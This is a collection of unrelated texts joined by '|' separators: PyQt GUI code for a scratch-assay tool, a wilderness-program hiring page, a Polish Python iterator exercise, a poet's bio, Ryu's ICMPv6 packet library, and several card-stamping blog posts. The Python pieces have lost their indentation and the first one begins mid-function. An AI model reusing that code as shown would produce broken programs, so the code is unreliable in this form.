QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a TimePoint')
def tpDel(self):
tp = self.selectedItem.src
if tp.is_timepoint():
id = self.exp.index(tp)
del(self.exp[id])
self.refreshTree()
def wellAdd(self):
tp = self.selectedItem.src
if tp.is_timepoint():
folder = QtWidgets.QFileDialog.getExistingDirectory(self, 'Select a TimePoint directory', './')
if not os.path.isdir(folder):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
well = engine.well()
if well.guess(folder):
tp.append(well)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def wellDel(self):
well = self.selectedItem.src
if well.is_well():
id = well.parent.index(well)
del(well.parent[id])
self.refreshTree()
def picDel(self):
pic = self.selectedItem.src
if pic.is_picture():
id = pic.parent.index(pic)
del (pic.parent[id])
self.refreshTree()
def picAdd(self):
tp = self.selectedItem.src
if tp.is_well():
selection = QtWidgets.QFileDialog.getOpenFileName(self, caption='Select a Picture', filter='*.*')
filename = selection[0]
if not os.path.isfile(filename):
return
QtWidgets.QApplication.setOverrideCursor(QtGui.QCursor(QtCore.Qt.WaitCursor))
pic = engine.picture()
if pic.guess(filename):
tp.append(pic)
self.refreshTree()
QtWidgets.QApplication.restoreOverrideCursor()
else:
QtWidgets.QApplication.restoreOverrideCursor()
QtWidgets.QMessageBox.information(self, 'ERROR', 'The proposed directory could not be guessed as a Well')
def setConnections(self):
#clickable1=[self.ui.radio_view,self.ui.radio_deriv,self.ui.radio_smooth]
#editable =[self.ui.derorder,self.ui.s_mth,self.ui.s_vth,self.ui.sg_fw,self.ui.sg_mm,self.ui.plath,self.ui.lasth]
#for o in clickable1:
# o.clicked.connect(self.refreshCurve)
#for o in editable:
# o.editingFinished.connect(self.updateCurve)
# o.valueChanged.connect(self.reddish)
self.ui.actionGuess.triggered.connect(self.expGuess)
self.ui.actionLoad.triggered.connect(self.expLoad)
self.ui.actionSave.triggered.connect(self.expSave)
self.ui.treeWidget.currentItemChanged.connect(self.selectElement)
self.ui.actionAdd.triggered.connect(self.tpAdd)
self.ui.actionRemove.triggered.connect(self.tpDel)
self.ui.actionAddWell.triggered.connect(self.wellAdd)
self.ui.actionRemoveWell.triggered.connect(self.wellDel)
self.ui.actionAddPic.triggered.connect(self.picAdd)
self.ui.actionRemovePic.triggered.connect(self.picDel)
self.ui.treeWidget.currentItemChanged.connect(self.watch)
self.ui.view_stored.clicked.connect(self.rewatch)
self.ui.view_raw.clicked.connect(self.rewatch)
self.ui.view_otf.clicked.connect(self.rewatch)
self.ui.cannysigma.valueChanged.connect(self.rewatch)
self.ui.minobj.valueChanged.connect(self.rewatch)
self.ui.minholes.valueChanged.connect(self.rewatch)
QtCore.QMetaObject.connectSlotsByName(self)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
app.setApplicationName( 'Scratch assay Wizard' )
canale = woundWindow()
canale.show()
#QtCore.QObject.connect( app, QtCore.SIGNAL( 'lastWindowClosed()' ), app, QtCore.SLOT( 'quit()' ) )
sys.exit(app.exec_())
|
If you become a member of the RedCliff Ascent field staff, then you will live alongside students in the wilderness. You will be together for eight days at a time. During your time in the field, you will do everything that the students do, sharing the experiences of camping, hiking, primitive skills, and navigating group dynamics. Because RCA provides wilderness training, the appropriate attitude can often be the most important quality. RCA looks for people with a “we” mentality in their field staff, not an “us” vs. “them” mindset.
"We look for people who are humble. We look for people who are hungry to have a positive influence on others." said Emily Novakovich, Human Resources Manager. "In addition, we look for people who are socially smart, and we look for people who are believers in the wilderness. We want people who are always going to be working on improving and learning."
RCA understands that families are trusting us with the safety of their children. It is a responsibility that we take very seriously. As a result, our hiring process is thorough.
If you are interested in working for RCA, then the first step is to complete an online inquiry form. The hiring managers at RCA will look at your previous experience. For example, they will evaluate whether or not you have worked in wilderness programs in the past. They will also look for wilderness first responder certification. However, RCA is willing to provide training to those who share their core values but may not have much previous wilderness experience.
Wilderness work is unique. If you have not experienced working in the wilderness before in another program, then it is difficult to imagine what the job requires. RCA will give you the opportunity to discover what wilderness work is like for yourself.
The next step is a one-week job preview. This preview last about the same time as one shift. During this preview, you will interact with our students and learn about our policies and procedures. If you like what you experience during the preview, then you may complete an application. RCA offers positions to the best applicants based on their performance during the preview, their resume, and professional references.
If RCA offers you a position, then you would begin a training period. This includes two days of training on Positive Control Systems (PCS). PCS includes learning how to build rapport with students and de-escalate conflict situations.
There is also one day of orientation. The orientation process will help you to understand the basics of what it means to work at RCA. If you do not have any previous wilderness experience, then you will have an additional training period. This training period is in accordance with state regulations. You will not become field staff right away. First, you will become an intern. You will work as an intern for three shifts, or 24 days total. During this time, you will be provided with training that will help you to pass an exam to demonstrate proficiency at the end of your internship period.
In order to complete your training, you will be expected to perform well in a variety of area including teaching and supervisory skills, water and food procurement, conservation and sanitation, and other procedures. The internship period is broken down into different sections so that you will cover all aspects of your required training. You will be asked to complete certain tasks that correspond to different aspects of your training examination. Therefore, by the time you are ready to take your state exam, then you will be able to demonstrate proficiency.
The training process can seem intense, but that is because we are being entrusted with an intense amount of responsibility. If you are interested in working for RCA because you want to help at-risk youth, please consider applying. RCA is always looking for compassionate people who believe in the ability of the wilderness to heal.
|
class Kontakt:
def __init__(self, imie, nazwisko, adresy=[]):
self.imie = imie
self.nazwisko = nazwisko
self.adresy = adresy
def __iter__(self):
self.current_element = 0
return self
def __next__(self):
if self.current_element >= len(self.adresy):
raise StopIteration
address = self.adresy[self.current_element]
self.current_element += 1
return address
class Adres:
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return f'{self.__dict__}'
kontakt = Kontakt(imie='Jan', nazwisko='Twardowski', adresy=[
Adres(ulica='2101 E NASA Pkwy', miasto='Houston', stan='Texas',
kod='77058', panstwo='USA'),
Adres(ulica=None, miasto='Kennedy Space Center', kod='32899',
panstwo='USA'),
Adres(ulica='4800 Oak Grove Dr', miasto='Pasadena', kod='91109',
panstwo='USA'),
Adres(ulica='2825 E Ave P', miasto='Palmdale', stan='California',
kod='93550', panstwo='USA'),
])
for adres in kontakt:
print(adres)
|
Leon Wing has taken on writing wholeheartedly after taking online courses from Open University and University of Iowa.
Leon Wing’s poems can be found in PoetryPoem, Readings from Readings 2, The Malaysian Poetic Chronicles, Eksentrika, Rambutan Literary, Haikuniverse.
A poem about the Syrian migration to Europe is featured in the Fixi anthology Little Basket 2017. He occasionally takes some poem apart and puts it back together, on the poetry blog https://puisipoesy.blogspot.com.
He has short stories published in Eksentrika, Queer Southeast Asia and a Canadian Asian literary magazine Ricepaper, and in anthologies like PJ Confidential and Remang, a collection of Malaysian ghost stories.
|
# Copyright (C) 2012 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
import sys
import array
import binascii
from . import packet_base
from . import packet_utils
from ryu.lib import addrconv
from ryu.lib import stringify
ICMPV6_DST_UNREACH = 1 # dest unreachable, codes:
ICMPV6_PACKET_TOO_BIG = 2 # packet too big
ICMPV6_TIME_EXCEEDED = 3 # time exceeded, code:
ICMPV6_PARAM_PROB = 4 # ip6 header bad
ICMPV6_ECHO_REQUEST = 128 # echo service
ICMPV6_ECHO_REPLY = 129 # echo reply
MLD_LISTENER_QUERY = 130 # multicast listener query
MLD_LISTENER_REPOR = 131 # multicast listener report
MLD_LISTENER_DONE = 132 # multicast listener done
# RFC2292 decls
ICMPV6_MEMBERSHIP_QUERY = 130 # group membership query
ICMPV6_MEMBERSHIP_REPORT = 131 # group membership report
ICMPV6_MEMBERSHIP_REDUCTION = 132 # group membership termination
ND_ROUTER_SOLICIT = 133 # router solicitation
ND_ROUTER_ADVERT = 134 # router advertisment
ND_NEIGHBOR_SOLICIT = 135 # neighbor solicitation
ND_NEIGHBOR_ADVERT = 136 # neighbor advertisment
ND_REDIREC = 137 # redirect
ICMPV6_ROUTER_RENUMBERING = 138 # router renumbering
ICMPV6_WRUREQUEST = 139 # who are you request
ICMPV6_WRUREPLY = 140 # who are you reply
ICMPV6_FQDN_QUERY = 139 # FQDN query
ICMPV6_FQDN_REPLY = 140 # FQDN reply
ICMPV6_NI_QUERY = 139 # node information request
ICMPV6_NI_REPLY = 140 # node information reply
ICMPV6_MAXTYPE = 201
class icmpv6(packet_base.PacketBase):
"""ICMPv6 (RFC 2463) header encoder/decoder class.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
type\_ Type
code Code
csum CheckSum
(0 means automatically-calculate when encoding)
data Payload.
ryu.lib.packet.icmpv6.echo object, or \
ryu.lib.packet.icmpv6.nd_neighbor object, or a bytearray.
============== ====================
"""
_PACK_STR = '!BBH'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ICMPV6_TYPES = {}
@staticmethod
def register_icmpv6_type(*args):
def _register_icmpv6_type(cls):
for type_ in args:
icmpv6._ICMPV6_TYPES[type_] = cls
return cls
return _register_icmpv6_type
def __init__(self, type_, code, csum, data=None):
super(icmpv6, self).__init__()
self.type_ = type_
self.code = code
self.csum = csum
self.data = data
@classmethod
def parser(cls, buf):
(type_, code, csum) = struct.unpack_from(cls._PACK_STR, buf)
msg = cls(type_, code, csum)
offset = cls._MIN_LEN
if len(buf) > offset:
cls_ = cls._ICMPV6_TYPES.get(type_, None)
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg, None, None
def serialize(self, payload, prev):
hdr = bytearray(struct.pack(icmpv6._PACK_STR, self.type_,
self.code, self.csum))
if self.data is not None:
if self.type_ in icmpv6._ICMPV6_TYPES:
hdr += self.data.serialize()
else:
hdr += self.data
if self.csum == 0:
self.csum = packet_utils.checksum_ip(prev, len(hdr), hdr + payload)
struct.pack_into('!H', hdr, 2, self.csum)
return hdr
@icmpv6.register_icmpv6_type(ND_NEIGHBOR_SOLICIT, ND_NEIGHBOR_ADVERT)
class nd_neighbor(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor Solicitation and
Neighbor Advertisement messages. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
res R,S,O Flags for Neighbor Advertisement. \
The 3 MSBs of "Reserved" field for Neighbor Solicitation.
dst Target Address
type\_ "Type" field of the first option. None if no options. \
NOTE: This implementation doesn't support two or more \
options.
length "Length" field of the first option. None if no options.
data An object to describe the first option. \
None if no options. \
Either ryu.lib.packet.icmpv6.nd_option_la object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!I16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
ND_OPTION_TLA = 2 # Target Link-Layer Address
ND_OPTION_PI = 3 # Prefix Information
ND_OPTION_RH = 4 # Redirected Header
ND_OPTION_MTU = 5 # MTU
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_neighbor._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, res, dst, type_=None, length=None, data=None):
self.res = res << 29
self.dst = dst
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
(res, dst) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(res >> 29, addrconv.ipv6.bin_to_text(dst))
offset += cls._MIN_LEN
if len(buf) > offset:
(msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
offset += 2
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_neighbor._PACK_STR, self.res,
addrconv.ipv6.text_to_bin(self.dst)))
if self.type_ is not None:
hdr += bytearray(struct.pack('!BB', self.type_, self.length))
if self.type_ in nd_neighbor._ND_OPTION_TYPES:
hdr += self.data.serialize()
elif self.data is not None:
hdr += bytearray(self.data)
return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_SOLICIT)
class nd_router_solicit(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Router Solicitation messages.
(RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
res This field is unused. It MUST be initialized to zero.
type\_ "Type" field of the first option. None if no options. \
NOTE: This implementation doesn't support two or more \
options.
length "Length" field of the first option. None if no options.
data An object to describe the first option. \
None if no options. \
Either ryu.lib.packet.icmpv6.nd_option_la object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!I'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_router_solicit._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, res, type_=None, length=None, data=None):
self.res = res
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
res = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(res)
offset += cls._MIN_LEN
if len(buf) > offset:
(msg.type_, msg.length) = struct.unpack_from('!BB', buf, offset)
cls_ = cls._ND_OPTION_TYPES.get(msg.type_, None)
offset += 2
if cls_:
msg.data = cls_.parser(buf, offset)
else:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_router_solicit._PACK_STR, self.res))
if self.type_ is not None:
hdr += bytearray(struct.pack('!BB', self.type_, self.length))
if self.type_ in nd_router_solicit._ND_OPTION_TYPES:
hdr += self.data.serialize()
elif self.data is not None:
hdr += bytearray(self.data)
return hdr
@icmpv6.register_icmpv6_type(ND_ROUTER_ADVERT)
class nd_router_advert(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Router Advertisement messages.
(RFC 4861)
This is used with ryu.lib.packet.icmpv6.icmpv6.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
ch_l Cur Hop Limit.
res M,O Flags for Router Advertisement.
rou_l Router Lifetime.
rea_t Reachable Time.
ret_t Retrans Timer.
type\_ List of option type. Each index refers to an option. \
None if no options. \
NOTE: This implementation support one or more \
options.
length List of option length. Each index refers to an option. \
None if no options. \
data List of option data. Each index refers to an option. \
None if no options. \
ryu.lib.packet.icmpv6.nd_option_la object, \
ryu.lib.packet.icmpv6.nd_option_pi object \
or a bytearray.
============== ====================
"""
_PACK_STR = '!BBHII'
_MIN_LEN = struct.calcsize(_PACK_STR)
_ND_OPTION_TYPES = {}
# ND option type
ND_OPTION_SLA = 1 # Source Link-Layer Address
ND_OPTION_PI = 3 # Prefix Information
ND_OPTION_MTU = 5 # MTU
@staticmethod
def register_nd_option_type(*args):
def _register_nd_option_type(cls):
for type_ in args:
nd_router_advert._ND_OPTION_TYPES[type_] = cls
return cls
return _register_nd_option_type
def __init__(self, ch_l, res, rou_l, rea_t, ret_t, type_=None, length=None,
data=None):
self.ch_l = ch_l
self.res = res << 6
self.rou_l = rou_l
self.rea_t = rea_t
self.ret_t = ret_t
self.type_ = type_
self.length = length
self.data = data
@classmethod
def parser(cls, buf, offset):
(ch_l, res, rou_l, rea_t, ret_t) = struct.unpack_from(cls._PACK_STR,
buf, offset)
msg = cls(ch_l, res >> 6, rou_l, rea_t, ret_t)
offset += cls._MIN_LEN
msg.type_ = list()
msg.length = list()
msg.data = list()
while len(buf) > offset:
(type_, length) = struct.unpack_from('!BB', buf, offset)
msg.type_.append(type_)
msg.length.append(length)
cls_ = cls._ND_OPTION_TYPES.get(type_, None)
offset += 2
if cls_:
msg.data.append(cls_.parser(buf[:offset+cls_._MIN_LEN],
offset))
offset += cls_._MIN_LEN
else:
msg.data.append(buf[offset:])
offset = len(buf)
return msg
def serialize(self):
hdr = bytearray(struct.pack(nd_router_advert._PACK_STR, self.ch_l,
self.res, self.rou_l, self.rea_t,
self.ret_t))
if self.type_ is not None:
for i in range(len(self.type_)):
hdr += bytearray(struct.pack('!BB', self.type_[i],
self.length[i]))
if self.type_[i] in nd_router_advert._ND_OPTION_TYPES:
hdr += self.data[i].serialize()
elif self.data[i] is not None:
hdr += bytearray(self.data[i])
return hdr
@nd_neighbor.register_nd_option_type(nd_neighbor.ND_OPTION_SLA,
nd_neighbor.ND_OPTION_TLA)
@nd_router_solicit.register_nd_option_type(nd_router_solicit.ND_OPTION_SLA)
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_SLA)
class nd_option_la(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor discovery
Source/Target Link-Layer Address Option. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.nd_neighbor,
ryu.lib.packet.icmpv6.nd_router_solicit or
ryu.lib.packet.icmpv6.nd_router_advert.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
hw_src Link-Layer Address. \
NOTE: If the address is longer than 6 octets this contains \
the first 6 octets in the address. \
This implementation assumes the address has at least \
6 octets.
data A bytearray which contains the rest of Link-Layer Address \
and padding. When encoding a packet, it's user's \
responsibility to provide necessary padding for 8-octets \
alignment required by the protocol.
============== ====================
"""
_PACK_STR = '!6s'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, hw_src, data=None):
self.hw_src = hw_src
self.data = data
@classmethod
def parser(cls, buf, offset):
(hw_src, ) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(addrconv.mac.bin_to_text(hw_src))
offset += cls._MIN_LEN
if len(buf) > offset:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(self._PACK_STR,
addrconv.mac.text_to_bin(self.hw_src)))
if self.data is not None:
hdr += bytearray(self.data)
return hdr
@nd_router_advert.register_nd_option_type(nd_router_advert.ND_OPTION_PI)
class nd_option_pi(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Neighbor discovery
Prefix Information Option. (RFC 4861)
This is used with ryu.lib.packet.icmpv6.nd_router_advert.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
.. tabularcolumns:: |l|p{35em}|
============== ====================
Attribute Description
============== ====================
pl Prefix Length.
res1 L,A,R\* Flags for Prefix Information.
val_l Valid Lifetime.
pre_l Preferred Lifetime.
res2 This field is unused. It MUST be initialized to zero.
prefix An IP address or a prefix of an IP address.
============== ====================
\*R flag is defined in (RFC 3775)
"""
_PACK_STR = '!BBIII16s'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, pl, res1, val_l, pre_l, res2, prefix):
self.pl = pl
self.res1 = res1 << 5
self.val_l = val_l
self.pre_l = pre_l
self.res2 = res2
self.prefix = prefix
@classmethod
def parser(cls, buf, offset):
(pl, res1, val_l, pre_l, res2, prefix) = struct.unpack_from(cls.
_PACK_STR,
buf,
offset)
msg = cls(pl, res1 >> 5, val_l, pre_l, res2,
addrconv.ipv6.bin_to_text(prefix))
return msg
def serialize(self):
hdr = bytearray(struct.pack(self._PACK_STR, self.pl, self.res1,
self.val_l, self.pre_l, self.res2,
addrconv.ipv6.text_to_bin(self.prefix)))
return hdr
@icmpv6.register_icmpv6_type(ICMPV6_ECHO_REPLY, ICMPV6_ECHO_REQUEST)
class echo(stringify.StringifyMixin):
"""ICMPv6 sub encoder/decoder class for Echo Request and Echo Reply
messages.
This is used with ryu.lib.packet.icmpv6.icmpv6 for
ICMPv6 Echo Request and Echo Reply messages.
An instance has the following attributes at least.
Most of them are same to the on-wire counterparts but in host byte order.
__init__ takes the correspondig args in this order.
============== ====================
Attribute Description
============== ====================
id Identifier
seq Sequence Number
data Data
============== ====================
"""
_PACK_STR = '!HH'
_MIN_LEN = struct.calcsize(_PACK_STR)
def __init__(self, id_, seq, data=None):
self.id = id_
self.seq = seq
self.data = data
@classmethod
def parser(cls, buf, offset):
(id_, seq) = struct.unpack_from(cls._PACK_STR, buf, offset)
msg = cls(id_, seq)
offset += cls._MIN_LEN
if len(buf) > offset:
msg.data = buf[offset:]
return msg
def serialize(self):
hdr = bytearray(struct.pack(echo._PACK_STR, self.id,
self.seq))
if self.data is not None:
hdr += bytearray(self.data)
return hdr
|
I made the following cards for One Layer Wednesday challenge 51. The challenge this week is to make 3 one layer cards using the same image on 3 separate cards, 3 different ways.
I used a stamp from Papertrey Ink and sentiments from Hero Arts. The first one's stems are stamped in black , the flowers with red , adding black shimmery stick on dots to the flower's centers and ribbon. The second is stamped with brown stems and versamark for the flowers then embossed in white, the sentiment in brown and blue shimmery stick on dots and ribbon. The stems on the third are stamped with old olive, and the flowers with yellow the sentiment in brown and brown shimmery stick on dots and ribbon. I was going to stamp the middles into the flowers, but these dots fit PERFECTLY and made me feel happy(I'm all about the happy!!)...and when I finished...I thought that a ribbon at the top was needed...the flowers and sentiment looked a little lonely. I know that we are supposed to keep embellishments to a minimum, but they are one layer, and in the end...being that I"m all about the happy...I'm happy.
What a fun challenge, and quick and simple...and now I've got 3 new cards instead of 1...thanks, Jennifer:)!!
Thanks for looking, hope you have a glorious day!!
The challenge was yesterday...I ran out of yesterday before I got to this, but DID get to it:)!! The main panel was long, so I opted for a longer image, and this set from A Muse was a perfect fit(well, I cut the bottoms of the trees off)...I loved it's long look! I stamped in black and dotted with 2 shades of pink rhinestones. Used a background stamp from Papertrey Ink for the panel behind the trees...stamped in versamark and clear embossed. Used 3 medium sized black brads and framed everything on black card. Super simple...but I DID love this sketch, even though I found those 3 circles a bit intimidating...conquered!!
I chose the square and decided to make a Mother's Day card (I'm going to send my mom a few this year:)!!). I thought the set Because of You had wonderful sentiments, so decided to use that for my card. I spied the stems in the set that looked like grape hyacinths...sweet flowers...so I used them behind my sentiment and decided then, that my card would have a purple flavor. I used Stampin Up flower and border punches and embossing folder for the back panel. Had a piece of Bazzill polka dotted embossed paper and some Enamel accents for the white dots. A great sketch...thanks for taking a look:)!!
I made this card for Case Study Challenge 36, found HERE .
I chose to keep the layout...did my out-of-the-box on the other side with a totally different set of images and colors(the colors are kinda "out there" for me...hmm:)!!). I colored the flowers with Prismacolor pencils and used baby oil. I popped up the layers, added ribbon , button, sentiment and pearls.
Thanks for looking, hope you Monday is marvelous!!
Ever have an evolution card? One that started out with an entirely different thought, for an entirely different challenge, and it "evolved" into something TOTALLY DIFFERENT? This was THAT kind of card!!
I found the simple scalloped circle very intriguing...and thought....what if I cut in between the scallops and made a crazy daisy??? So that's what I did. I cut into the center of the circle...not too far and definitely not perfectly(no matter, the brad covers the imperfections)...just always look to the center when cutting, otherwise your cuts will go sideways a bit...well, mine did:)!! I also used a die for the leaves made by QuicKutz that I purchased from Amazon.com some time ago when looking for leaves and vines. The die is 12" long, but I use it to the length and sections that I want. I ran it through once in yellow, and once in black and filled in the black vine with the yellow vine's leaves. I added sentiment and a rhinestone to dot the "i" .
I made this card for the One Layer Wednesday challenge #50...to make a one layer card with an old stamp and make it a thank you card. The challenge can be found HERE .
Did that all the way around, added rhinestones, scored lines at the bottom and added ribbon...I know...a bit heavy with the embellishments...but I thought they really "fit"...and weren't too heavy??!!:)!
This is the first card I made...had it done, and then realized that the challenge was a Thank you card....so made another with a bit larger sentiment stamp.
Being this was my first one, I think it's a little "off", I learned so many little things as I went... but it's ok. Somewhere I read, recently said that the flaws are what make our cards handmade...so a little "off" is ok.
Thanks so much for looking...hope your day is filled with inspiration:)!!
I already had a few stamped images, so all I had to do was color and cut. I used Prismacolor pencils and baby oil, two each color of red, green and silver/gray...I don't color often, but I must admit, it can be fun and very relaxing:)!!
I had a piece of gray designer paper, and red SU textured cardstock and added piercing to the top and bottom. I used a sentiment from Verve and added ribbon and top of brad to bow. Popped up both panels. I thought to "add" more, but opted to keep it somewhat simple.
Oh, I just LOVE these layouts:)!!!
Thanks for looking, I hope you have a wonderful day:)!!
I made this card for Clean and Simple's FTL136 sketch, found HERE .
I haven't been to Mike's (Michael's) too much, of late, but had a coupon and a day to "flit" and bought this book of design paper. I am not one who uses a lot of design paper, but every once in a while I do, and LOVE to have dp that I LOVE! I thought, unlike a lot of design papers, this woud be GREAT for cards(the patterns were smaller and closer together),and... I LOVED the colors AND the designs!!!
So....the card was super simple...the only hard part, deciding on which papers. The bermuda bay colored paper actually has circular designs on it...it's very faint, but not plain. Natasha on Clean and Simple's Blog, had used a ribbon as one of the panels...it worked on my card...thanks for the inspiration:)!! I used another new set from Papertrey Ink...a set of frames, to put the sentiment on. I added a PTI button with a white stick on dot placed in the middle making it not look so much like a button.
I used a new stamp I got from Papertrey Ink(thanks Mom:)!!) which stamps a gingham pattern and a flower from another PTI set. The doily design is a die from PTI, as well. It was a little tough figuring out how to make it work...the first couple times I used it, it didn't cut the paper too well. I put an extra piece of packaging paper(really thick) behind the cutting part of the die, and it worked like a charm! I struggled with the sentiment...tried a bunch, but settled on a simple "hello"...I thought it just fit:)!! I know I may be in the minority...but I was sad when Taken with Teal was Taken Away...I LOVE teal!! Oh well....I bought a bit before they stopped making it:)!!
Now, I'll be right in time for the next Clean and Simple sketch....YEAH!!
I have been out all day working in the yard...cleaning up and cleaning out my yard...whew...it has been A LOT of work!!! I made this card early this morning for One Layer Wednesday, this week hosted by Jennifer Styles, her blog and the challenge found HERE The challenge this week is to make a one layer card with green and pink and a stamp that has never seen ink! I hate to admit...I had a lot of choices:)!!
So after I put the card in the embossing folder, I put the frame over the image and sentiment and embossed with one less acrylic plate(I have a Big Shot). I then took my Martha Stewart scoring board and scored a frame around the image and sentiment. I goofed with putting the frame a little too close to the flower...but it will have to do:)!! I added 2 rhinestones in the centers of the 2 open flowers and done!!
Thanks for taking a look...I hope you have a wonderful day:)!!
This is a close up on the diamond glazed middles.
I decided on a daisy bouquet by Gina K Designs and after stamping it, decided to try the clean and simple look and style of Silke, once again(it's addictive:)!!). By that I mean the simple layering and the use of silver pearls that she is known for...but it DID just feel right with this stamp and this card. This will be my mom's card for Mother's Day....she LOVES daisies!
The small circle did not afford the opportunity for a large sentiment, so I masked each word, and stamped them vertical. I started with the word "mother's" first, making sure it was kinda centered, and then stamped the other two...just a thought.
Used a piece of Bazzill embossed paper from Mikes, and a striped embossing folder for the yellow.
Thanks for taking a look, I hope you have a wonderful day:)!!
This is the first time I have pierced this much...before maybe a corner, but decided to take it all the way around the panel. I added a border piece on the bottom and added silver pearls. The rest is pretty simple...and with the butterfly...I had black 26 gauge wire and wound it around the body of the 2 butterflies and twisted it once at the top, and cut and sort of curled the antennae. Now THIS is more me:):)!! Just goes to show you that you CAN make a cleaner card, no matter how many elements or layers are in the sketch:)!! Thanks Silke for the wonderful inspiration your cards bring to me:)!!!!
Thanks for taking a look...I hope your day is filled with wonder!!
I changed the color, the border, the sentiment, and the embellishments, but I LOVED the images and layout...so I kept that all the same! I LOVE how she doesn't have to frame each panel, pops it up, and it looks beautiful...sooooo cool!!
I used Papertrey butterfly dies, and then the stamps, colored with old SU markers and layered. I used the SU border punch, and the black dots are Enamel Accents(I use them ALOT!).
I am looking forward to the rest of the month...but I doubt I'll veer too far from her work...it's my chance to have Silke's cards for my own:)!!
Thanks for looking, I hope you have a great weekend!!!
I used one of my favorite butterfly stamps, from Gina K Designs, and inked the stamp with Sahara Sand. I stamped the butterfly on scrap paper each time I stamped, to get a lighter image. I then stamped the sentiment over the 3 butterflies with Early Espresso and embossed. I added 3 scored lines on both sides, and that's it. I thought that when I started this, it would take a long time...it only took minutes...fast and easy!! Now, it's on to another challenge!!
I embossed the white paper, traced the oval and cut it out. I suppose you could use a nestie to cut the hole, as well, but I embossed first, so I hand cut the oval:)!! I used an oval nestie and a scalloped one a couple sizes bigger for the frame. Stamped the flower and stems using a stamp a ma jig for positioning and used it for the sentiment, as well. I like the textured look of Bazzill paper, so I used the back side of a piece of bazzill white for the flowers, so the whites matched. Attached the white panel of flowers directly to the blushing bride card, and popped up the embossed and framed piece.
Thanks for looking...hope you have a fantastic day!!
I stamped the flower from Unity Stamps twice in cool caribbean and once in so saffron. I cut them out and popped them up. Made two strips of so saffron and one of cool caribbean using a polka dotted embossing folder on the blue. LOVE these colors, too!
I am trying to pull out old stamps...well old is relative...this Helen Keller quote stamp is less than a year old...but I hate to admit it, I've NEVER used it. I stamped a stamp from A Muse(I inked and stamped on white two times....each time stamping once lightly on a scrap piece of paper to get a lighter color on my card) with certainly celery and then stamped the quote over it with early espresso. I found a piece of SU designer paper and embossed a piece of certainly celery with a heart embossing folder. I used this punch, below, to get the hearts, and glued them on with a glue stick.
Popped up the flowers and added $1 rhinestones from Mike's, then popped up the black panel. The sentiment is stamped in versamark and embossed with white embossing powder.
|
#!/usr/bin/env python
